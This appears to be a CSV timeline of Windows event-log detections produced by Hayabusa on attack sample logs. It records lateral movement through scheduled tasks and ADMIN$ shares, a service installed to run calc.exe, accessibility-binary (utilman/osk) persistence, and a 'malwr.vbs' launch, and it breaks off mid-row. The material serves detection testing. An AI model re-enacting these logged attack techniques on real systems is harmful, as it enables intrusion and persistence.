PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx 2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x18423d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:41:29.008 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: remotesvc | Path: calc.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x39e47fa | PID: 3824 | PGUID: 365ABB72-2550-5C91-0000-00108FE4CF05",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3688 | PGUID: 365ABB72-2550-5C91-0000-00101EE6CF05,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x39e47fa | PID: 4088 | PGUID: 365ABB72-2550-5C91-0000-00106CEACF05",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3092 | PGUID: 365ABB72-2560-5C91-0000-0010C721DA05,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 4004 | PGUID: 365ABB72-262B-5C91-0000-0010B2566006,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x39e47fa | PID: 2792 | PGUID: 365ABB72-262D-5C91-0000-00108EA26106,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 3264 | PGUID: 365ABB72-2757-5C91-0000-0010A2B52A07,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 2056 | PGUID: 365ABB72-2883-5C91-0000-00101656F407,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 1756 | PGUID: 365ABB72-29AF-5C91-0000-0010B895C008,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1876 | PGUID: 365ABB72-29B4-5C91-0000-00108191C308",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x39e47fa | PID: 3748 | PGUID: 365ABB72-29B4-5C91-0000-0010289AC308,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x39e47fa | PID: 3488 | PGUID: 365ABB72-29B4-5C91-0000-0010999AC308,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2384 | PGUID: 365ABB72-29B5-5C91-0000-0010BE04C408",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe C:\Windows\system32\CompatTelRunner.exe | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-29ED-5C91-0000-00107271E808,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-528C-5C91-0000-00104B4B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-528C-5C91-0000-0010644D0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-528D-5C91-0000-00103B500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-528D-5C91-0000-001056500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-528D-5C91-0000-00109C500000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 484 | PGUID: 365ABB72-528D-5C91-0000-001062560000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 500 | PGUID: 365ABB72-528D-5C91-0000-0010AD570000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 508 | PGUID: 365ABB72-528D-5C91-0000-0010DA570000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-528D-5C91-0000-00100C580000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 632 | PGUID: 365ABB72-528F-5C91-0000-001073780000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 692 | PGUID: 365ABB72-528F-5C91-0000-0010ECB50000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 876 | PGUID: 365ABB72-528F-5C91-0000-00106BBE0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1012 | PGUID: 365ABB72-5290-5C91-0000-001033D00000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1136 | PGUID: 365ABB72-5290-5C91-0000-00104C100100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:14.563 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1416 | PGUID: 365ABB72-5292-5C91-0000-00101E310100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 365ABB72-5292-5C91-0000-001036480100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-52A4-5C91-0000-0010A8560100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-52B4-5C91-0000-0010355B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-52B4-5C91-0000-0010D55B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-52B4-5C91-0000-0010C25D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-52CE-5C91-0000-00109D740100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.454 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1948 | PGUID: 365ABB72-52EC-5C91-0000-001027860100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | 